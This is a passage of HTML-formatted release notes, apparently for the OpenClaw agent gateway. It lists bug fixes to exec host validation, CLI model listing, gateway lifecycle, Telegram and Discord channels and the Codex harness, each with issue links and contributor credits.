<li>Exec: reject invalid per-call <code>host</code> values instead of silently falling back to the default target, so hostname-like values fail before commands run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351549756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74426/hovercard" href="https://github.com/openclaw/openclaw/issues/74426">#74426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scr00ge-00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scr00ge-00">@scr00ge-00</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Google/Gemini: send non-empty placeholder content when a Gemini run is triggered with empty or filtered user content, avoiding <code>contents is not specified</code> API errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CaoYuhaoCarl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CaoYuhaoCarl">@CaoYuhaoCarl</a>.</li>
<li>Heartbeat: preserve non-task <code>HEARTBEAT.md</code> context around <code>tasks:</code> blocks and apply <code>agents.defaults.heartbeat</code> to all agents unless per-agent heartbeat entries restrict scope. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sekhar03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sekhar03">@Sekhar03</a>.</li>
<li>Markdown: preserve paragraph breaks inside loose list items in shared outbound formatting while keeping tight list spacing stable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Build/Gateway: route restart, shutdown, respawn, diagnostics, command-queue cleanup, and runtime cleanup through one stable gateway lifecycle runtime entry so rebuilt packages do not strand long-running gateways on stale hashed chunks. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347423967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73964" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73964/hovercard" href="https://github.com/openclaw/openclaw/pull/73964">#73964</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Memory/wiki: keep broad shared-source and generated related-link blocks from turning every page into a search hit, cap noisy backlinks, support all-term searches such as people-routing queries, and prefer readable page body snippets over generated metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Cron/Gateway: abort and bounded-clean up timed-out isolated agent turns before recording the timeout, so stale cron sessions cannot leave Discord or other chat lanes stuck in <code>processing</code> after a timeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/errors: suppress malformed streaming tool-call JSON fragments before they reach chat surfaces while preserving provider request-validation diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187420949" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59076" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59076/hovercard" href="https://github.com/openclaw/openclaw/issues/59076">#59076</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187447924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59080/hovercard" href="https://github.com/openclaw/openclaw/issues/59080">#59080</a> as duplicate coverage. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187915161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59118" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59118/hovercard" href="https://github.com/openclaw/openclaw/pull/59118">#59118</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/singleGanghood/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/singleGanghood">@singleGanghood</a>.</li>
<li>CLI/models: restore provider-filtered <code>models list --all --provider &lt;id&gt;</code> rows for providers without manifest/static catalog coverage, including Anthropic and Amazon Bedrock, while keeping the compatibility fallback off expensive availability and resolver paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep manifest auth-evidence credentials visible across <code>models status</code>, auth probes, and PI model discovery so workspace-scoped provider auth does not disagree between listing, probing, and execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move local credential evidence such as Google Vertex ADC into generic plugin manifest setup metadata so the model-list auth index stays declarative without provider-specific runtime branches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: compute the <code>models list</code> Auth column through one command-local provider auth index so row rendering no longer repeats auth profile, env, configured-provider, AWS, or synthetic-auth checks per model row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move the OpenAI listable catalog into the plugin manifest so <code>models list --all --provider openai</code> uses the manifest fast path instead of loading provider runtime normalization hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/tools: keep the Gateway <code>tools.*</code> RPC namespace out of plugin command discovery and managed proxy startup, so stray commands like <code>openclaw tools effective</code> fail quickly instead of cold-loading plugin metadata. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>CLI/status: keep default text <code>openclaw status --usage</code> on metadata-only channel scans unless <code>--deep</code> or <code>--all</code> is set, and send stray <code>openclaw tools --help</code> through the precomputed root-help fast path so latency-triage commands avoid plugin/runtime cold loads before printing. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349031630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74220" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74220/hovercard" href="https://github.com/openclaw/openclaw/pull/74220">#74220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/diagnostics: trace embedded-run startup and preparation stage timings before model I/O, and warn only on severe slow stages, so Docker/VPS latency reports can identify whether plugin loading, auth/model resolution, tool inventory, bootstrap, MCP/LSP, resource loading, or stream setup is dominating pre-run latency without noisy normal logs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Heyvhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Heyvhuang">@Heyvhuang</a>.</li>
<li>Agents/subagents: cache persisted subagent run registry reads by file signature while preserving fresh-parse isolation, so busy gateways stop reparsing unchanged <code>subagents/runs.json</code> on controller/list/status hot paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/argus-as/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/argus-as">@argus-as</a>.</li>
<li>Gateway/clients: wait for the event loop to become responsive before opening Gateway WebSocket RPC/probe/client connections while charging that readiness wait to caller timeouts, so Windows deferred module-evaluation stalls no longer turn healthy loopback gateways into false handshake timeouts across status, TUI, ACP, MCP, node-host, and plugin client paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349780099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74279/hovercard" href="https://github.com/openclaw/openclaw/issues/74279">#74279</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4082797740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48270" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48270/hovercard" href="https://github.com/openclaw/openclaw/pull/48270">#48270</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wongcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wongcode">@wongcode</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joost-heijden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joost-heijden">@joost-heijden</a>.</li>
<li>Gateway/Windows: read listener command lines via PowerShell before falling back to <code>wmic</code>, so restart health can recognize OpenClaw listeners on modern Windows installs and avoid long anonymous-port waits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349819170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74280/hovercard" href="https://github.com/openclaw/openclaw/issues/74280">#74280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zym951223/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zym951223">@zym951223</a>.</li>
<li>Plugins/runtime-deps: record process start-time in bundled dependency install locks and expire recycled-PID locks, so Docker gateway restarts recover from stale <code>.openclaw-runtime-deps.lock</code> directories without waiting through repeated five-minute timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350992165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74361/hovercard" href="https://github.com/openclaw/openclaw/pull/74361">#74361</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Plugins/runtime-deps: memoize packaged bundled runtime dist-mirror preparation after the first successful pass while keeping source-checkout mirrors refreshable, so constrained Docker/VPS installs avoid repeated root scans before chat turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341661895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73421" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73421/hovercard" href="https://github.com/openclaw/openclaw/issues/73421">#73421</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/antoniusfelix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/antoniusfelix">@antoniusfelix</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkobject/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkobject">@jkobject</a>.</li>
<li>Channels/Discord: treat bare numeric outbound targets that match the effective Discord DM allowlist as user DMs while preserving account-specific legacy <code>dm.allowFrom</code> precedence over inherited root <code>allowFrom</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350101821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74303" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74303/hovercard" href="https://github.com/openclaw/openclaw/pull/74303">#74303</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Channels/Discord/Slack: share one DM policy/allowlist resolver across runtime, setup, allowlist editing, and doctor repair, so legacy <code>dm.policy</code> / <code>dm.allowFrom</code> compatibility migrates to canonical <code>dmPolicy</code> / <code>allowFrom</code> without divergent access checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Control UI: make the chat sidebar split divider focusable, keyboard-resizable, ARIA-described, and pointer-event based so sidebar resizing works without a mouse. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/usage: keep PI embedded-run telemetry attributed to the resolved model provider instead of the PI harness label, so OpenRouter and other provider-backed turns report the right provider in session usage and traces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/attribution: send OpenClaw attribution headers on native OpenAI and Codex traffic, including SDK transports, realtime voice and TTS, device-code auth, WHAM usage, and remote embeddings, so PI-origin defaults no longer leak into provider requests. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/auth: keep OAuth auth profiles inherited from the main agent read-through instead of copying refresh tokens into secondary agents, and refresh Codex app-server tokens against the owning store so multi-agent swarms avoid reused refresh-token failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347764512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74055" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74055/hovercard" href="https://github.com/openclaw/openclaw/issues/74055">#74055</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ClarityInvest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ClarityInvest">@ClarityInvest</a>.</li>
<li>Channels/Telegram: honor <code>ALL_PROXY</code> / <code>all_proxy</code> and service-level <code>OPENCLAW_PROXY_URL</code> when constructing the HTTP/1-only Telegram Bot API transport, so Windows and service installs that rely on those proxy settings no longer fall back to direct egress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347549013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74014/hovercard" href="https://github.com/openclaw/openclaw/issues/74014">#74014</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Telegram: keep raw host/network-unreachable Bot API connect failures non-fatal and route tagged polling uncaught exceptions through the Telegram restart path, so transient reachability failures no longer kill the Gateway or leave long polling stuck. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202091022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60515/hovercard" href="https://github.com/openclaw/openclaw/issues/60515">#60515</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352759456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74540" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74540/hovercard" href="https://github.com/openclaw/openclaw/issues/74540">#74540</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thacid22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thacid22">@thacid22</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ewimsatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ewimsatt">@ewimsatt</a>.</li>
<li>Channels/Telegram: continue polling when <code>deleteWebhook</code> hits a transient network failure but <code>getWebhookInfo</code> confirms no webhook is configured, so startup does not retry cleanup forever after the webhook was already removed. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078467786" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47384/hovercard" href="https://github.com/openclaw/openclaw/pull/47384">#47384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clovericbot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clovericbot">@clovericbot</a>.</li>
<li>Channels/Telegram: retry native quote replies without <code>reply_parameters.quote</code> when Telegram returns <code>QUOTE_TEXT_INVALID</code>, so stale or truncated quote excerpts no longer drop the whole reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353246635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74581/hovercard" href="https://github.com/openclaw/openclaw/issues/74581">#74581</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>Channels/Telegram: apply strict safe-send retry to inbound final replies when grammY wraps a pre-connect failure, while leaving ambiguous plain network envelopes single-shot to avoid duplicate visible messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348834237" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74203/hovercard" href="https://github.com/openclaw/openclaw/issues/74203">#74203</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nanli2000cn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nanli2000cn">@nanli2000cn</a>.</li>
<li>Channels/Telegram: surface polling liveness warnings in channel status and doctor when a running long-poller has not completed <code>getUpdates</code> after startup grace or its transport activity is stale, so silent polling failures no longer look clean. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Channels/Telegram: publish webhook runtime state and warn when <code>setWebhook</code> has not completed after startup grace, so webhook-mode accounts no longer look healthy while registration is still failing or retrying. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Telegram: bound native command menu <code>deleteMyCommands</code> and <code>setMyCommands</code> Bot API calls and allow the same timeout-triggered transport fallback retry as other startup control calls, so Windows/WSL network stalls cannot leave command sync hanging behind an otherwise running provider. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>ACP/commands: accept forwarded ACP timeout config controls in the OpenClaw bridge, treat unsupported discard-close controls as recoverable cleanup, and restore native <code>/verbose full</code> plus no-arg status behavior, so Discord command menus and nested ACP turns no longer fail on supported session controls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: interrupt and release native app-server turns that go quiet after an OpenClaw dynamic-tool response without sending <code>turn/completed</code>, so Discord and other chat lanes do not stay stuck in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: bound OpenClaw dynamic tool responses to 30 seconds and fail closed with an explicit tool result when the app-server bridge would otherwise strand the turn in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>TUI/status: clear stale <code>streaming</code> footer state when a final event arrives after the active run was already cleared and no tracked runs remain, while preserving concurrent-run ownership and inactive local <code>/btw</code> terminal handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244725441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64825/hovercard" href="https://github.com/openclaw/openclaw/issues/64825">#64825</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244930419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64842/hovercard" href="https://github.com/openclaw/openclaw/pull/64842">#64842</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244936758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64843" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64843/hovercard" href="https://github.com/openclaw/openclaw/pull/64843">#64843</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244944537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64847" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64847/hovercard" href="https://github.com/openclaw/openclaw/pull/64847">#64847</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244992206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64862" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64862/hovercard" href="https://github.com/openclaw/openclaw/pull/64862">#64862</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" 